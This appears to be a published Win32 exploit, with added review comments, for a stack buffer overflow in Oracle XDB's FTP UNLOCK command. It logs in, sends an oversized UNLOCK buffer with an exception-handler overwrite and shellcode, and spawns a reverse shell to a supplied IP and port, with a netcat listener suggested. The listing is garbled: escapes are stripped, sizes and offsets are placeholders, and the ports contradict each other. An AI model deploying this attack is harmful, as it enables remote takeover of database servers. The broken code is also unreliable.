Oracle XDB FTP service UNLOCK buffer overflow

[+] vulnerability: network-level, stack-based buffer overflow
[+] special network layer attack
[+] implemented over HTTP / XML DB / FTP ==> Windows XDB
[+] connecting:8080
[=] operation: Win32 --> XDB overflow
[+] author mc2_s3lector
[+] yogyacarderlink.web.id/KeDai Computerworks.com


exploit win32
#include
#include
#include

// Forward declarations for the three stages below: Winsock setup,
// payload patching, then the FTP session that delivers the buffer.
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);

// File-scope connection state shared by StartWinsock() and GainControlOfOracle().
struct sockaddr_in s_sa;   // target address; filled by StartWinsock(), port set in GainControlOfOracle()
struct hostent *he;        // resolver result, or the sentinel (struct hostent *)1 on the numeric path
unsigned int addr;         // inet_addr() result when host[] is given as a dotted quad
// NOTE(review): "[value data]" is not valid C; the array sizes in this
// listing were replaced by a placeholder when the page was published,
// so none of these declarations compile as printed.
char host[value data]="";  // copied from argv[1] with strncpy(..., 250) in main()

// NOTE(review): the trailing backslash on the comment line below continues
// the comment onto the next line, so the `exploit` declaration is commented
// out as printed; this is probably extraction damage rather than intent.
//register acces\
unsigned char exploit[value data]=
// NOTE(review): every "\x" escape in this listing has lost its backslash,
// so as printed these literals are plain ASCII text, not byte values.
// This buffer is the stage appended last to exploit_code; SetUpExploit()
// overwrites six bytes in it (address and port) at offsets that are also
// placeholders here.
"x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF"
"xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50"
"x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C"
"x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89"
"x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13"
"x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC"
"x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C"
"x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89"
"x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83"
"xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89"
"x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33"
"xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A"
"x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66"
"x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45"
"xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0"
"x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84"
"x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57"
"x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50"
"x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8"
"x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD"
"x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03"
"x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48"
"x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83"
"xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41"
"x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03"
"x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3"
"x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C"
"xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8"
"x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B"
"x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B"
"xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF"
"xFFxFFxFFxFF";

// The command buffer sent after login: the FTP "UNLOCK" verb followed by
// filler. main() appends short_jump, exception_handler, exploit and CRLF
// to it with strcat() before it is sent.
// NOTE(review): the "put character" lines and the annotation trailing the
// fifth line are editorial placeholders, not C; the real filler and the
// array size are not on this page.
char exploit_code[value data]=
"UNLOCK / put character"
"put character"
"put character"
"put character"
"put character" --------->char or nummeric-----or combine chart&nummeric
"5eeefffggghhh";

// Two four-byte values spliced between the filler and the stage. The names
// and the order main() appends them (jump first, then handler) suggest a
// structured-exception-handler overwrite, but the target's layout is not
// shown here, so treat that as inferred. Both literals have lost their
// "\x" escapes as printed.
char exception_handler[value dataX]="x79x9Bxf7x77";
char short_jump[value dataX]="xEBx06x90x90";


// Entry point. Expects exactly five arguments (see the usage text below):
// argv[1] target host, argv[2]/argv[3] FTP credentials for the XDB listener,
// argv[4]/argv[5] the address and port the delivered stage connects back to.
// Returns 0 on completion or after printing usage; on Winsock failure it
// returns printf()'s character count (non-zero) as the exit status.
// NOTE(review): the printf format strings have lost their "\n"/"\t" escapes
// and two of them are split across lines, so this does not compile as printed.
int main(int argc, char *argv[])
{

if(argc != 6)
{
printf("nntOracle XDB FTP Service UNLOCK Buffer Overflow
Exploit");
printf("nntSpawns a reverse shell to specified port");
printf("nntUsage:t%s host userid password ipaddress
port",argv[0]);
printf("nt6th maret 2010nnn");
return 0;
}

// host[] has a placeholder size in this listing; strncpy with a count of 250
// leaves the buffer unterminated when argv[1] is 250 bytes or longer.
strncpy(host,argv[1],250);
// StartWinsock() returns 0 for every failure mode (WSAStartup, version
// mismatch, name resolution) and fills the global s_sa on success.
if(StartWinsock()==0)
return printf("Error starting Winsock.n");

// Write the connect-back address and port into exploit[]; atoi() gives 0
// for non-numeric input and nothing validates the result.
SetUpExploit(argv[4],atoi(argv[5]));

// Assemble the command buffer in place. None of these strcat() calls is
// bounded against exploit_code's capacity (a placeholder here).
strcat(exploit_code,short_jump);
strcat(exploit_code,exception_handler);
strcat(exploit_code,exploit);
strcat(exploit_code,"rn");   // CRLF terminator ("\r\n" with the escapes lost)

// Log in and send exploit_code; its return value is ignored.
GainControlOfOracle(argv[2],argv[3]);

return 0;

}


// Patch the connect-back IPv4 address and TCP port into the global exploit[].
// myip: dotted-quad string; myport: port number in host byte order.
// Returns 0 unconditionally; an inet_addr() failure (INADDR_NONE) is not
// detected and would be written into the payload as-is.
// NOTE(review): the "--->protocol" tail on the signature line is an editorial
// mark, and the "[value data]" indices stand in for the real byte offsets,
// so this function does not compile as printed.
int SetUpExploit(char *myip, int myport)--->protocol
{
unsigned int ip=0;
unsigned short prt=0;
char *ipt="";
char *prtt="";

ip = inet_addr(myip);   // already in network byte order

// Copy the four address bytes into the payload one at a time.
ipt = (char*)&ip;
exploit[value data]=ipt[0];
exploit[value data]=ipt[1];
exploit[value data]=ipt[2];
exploit[value data]=ipt[3];

// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80

// The port is stored in network order and bitwise-inverted (XOR 0xFFFF);
// presumably the stage undoes the inversion at runtime — not visible here.
prt = htons((unsigned short)myport);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
exploit[value data]=prtt[0];
exploit[value data]=prtt[1];

return 0;
}


// Initialise Winsock 2.0 and resolve the global host[] into the global s_sa.
// Returns 1 on success, 0 when WSAStartup() fails, the negotiated version is
// not 2.0, or (on the hostname path) the lookup result is NULL.
// Side effects: writes the globals he, addr and s_sa (sin_family and
// sin_addr only; the port is set later in GainControlOfOracle()).
int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;

wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
return 0;
// Version check; the condition is split across two lines in this listing.
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) !=
0 )
{
WSACleanup( );
return 0;
}

// A leading letter is taken to mean a hostname; anything else is treated
// as a dotted quad. NOTE(review): host[0] is a plain char passed to
// isalpha() without an unsigned char cast, which is undefined for
// negative values.
if (isalpha(host[0]))
{
he = gethostbyname(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
// NOTE(review): he is dereferenced here before the NULL check further
// down, so a failed lookup crashes rather than returning 0.
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
addr = inet_addr(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
// Non-NULL sentinel so the check below passes on the numeric path;
// an inet_addr() failure (INADDR_NONE) is not detected here.
he = (struct hostent *)1;
}

// Only ever NULL on the hostname path, and then unreachable (see above).
if (he == NULL)
{
return 0;
}
return 1;
}



// Log in to the target's XDB FTP listener (TCP 2100, from the global s_sa)
// with user/pass, then send the assembled global exploit_code as the next
// command and close the socket.
// Returns 0 after sending; on socket, connect or login failure it prints a
// message and returns printf()'s character count (non-zero).
// Detection note: the whole exchange is plaintext FTP — banner, "user",
// "pass", then an oversized "UNLOCK" command — so an abnormally long
// UNLOCK argument on this port is the observable indicator for defenders.
int GainControlOfOracle(char *user, char *pass)
{

// Command buffers; their sizes are placeholders in this listing. strncat's
// 230 bounds only the appended credential, not the total buffer length.
char usercmd[value dataXX]="user ";
char passcmd[value dataXX]="pass ";
char resp[1600]="";          // zero-filled; recv() reads at most 1500, so a NUL always remains
int snd=0,rcv=0;             // send()/recv() results are stored but never checked
struct sockaddr_in r_addr;   // NOTE(review): filled in below but never used (no bind())
SOCKET sock;


strncat(usercmd,user,230);
strcat(usercmd,"rn");   // "\r\n" with the escapes lost, here and below
strncat(passcmd,pass,230);
strcat(passcmd,"rn");


sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
return printf(" sock error");

r_addr.sin_family=AF_INET;
r_addr.sin_addr.s_addr=INADDR_ANY;
r_addr.sin_port=htons((unsigned short)0);
// Target port of the XDB FTP listener. (The header text above says 8080;
// the code connects to 2100.)
s_sa.sin_port=htons((unsigned short)2100);


if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
return printf("Connect error");

// Banner; echoed as received. An error or zero-length recv() still prints
// the (zeroed) buffer.
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);

// USER command and its reply.
snd=send(sock, usercmd , strlen(usercmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);

// PASS command; a reply whose first digit is '5' (FTP permanent error) is
// treated as a failed login.
snd=send(sock, passcmd , strlen(passcmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
if(resp[0]=='5')
{
closesocket(sock);
// NOTE(review): this format string is split across two lines as printed.
return printf("Failed to log in using user %s and password
%s.n",user,pass);
}
ZeroMemory(resp,1600);

// Send the assembled command buffer; no reply is read afterwards.
snd=send(sock, exploit_code, strlen(exploit_code) , 0);

Sleep(2000);   // presumably waits on the target before tearing the socket down

closesocket(sock);
return 0;
}


Big thanks to:
indonesian black hat team(www.yogyacarderlink.web.id)
KeDaiComputerworks.com
Jasakom(jasakom.com)
indonesianhacker.org
Indesign COmputer Care (INDESIGN)
Indonesian hacker(indonesianhacker.org)
one-day(the-codec),n3r0,elpaciano


http://www.vfocus.net/art/20100318/6787.html
http://securityreason.com/polish/pokaz_podwlb/WLB-2010030080
http://packetstormsecurity.org/1003-exploits/oraclexdb-overflow.txt
http://www.secnews.co.uk/article/17341/oraclexdb-overflow.txt

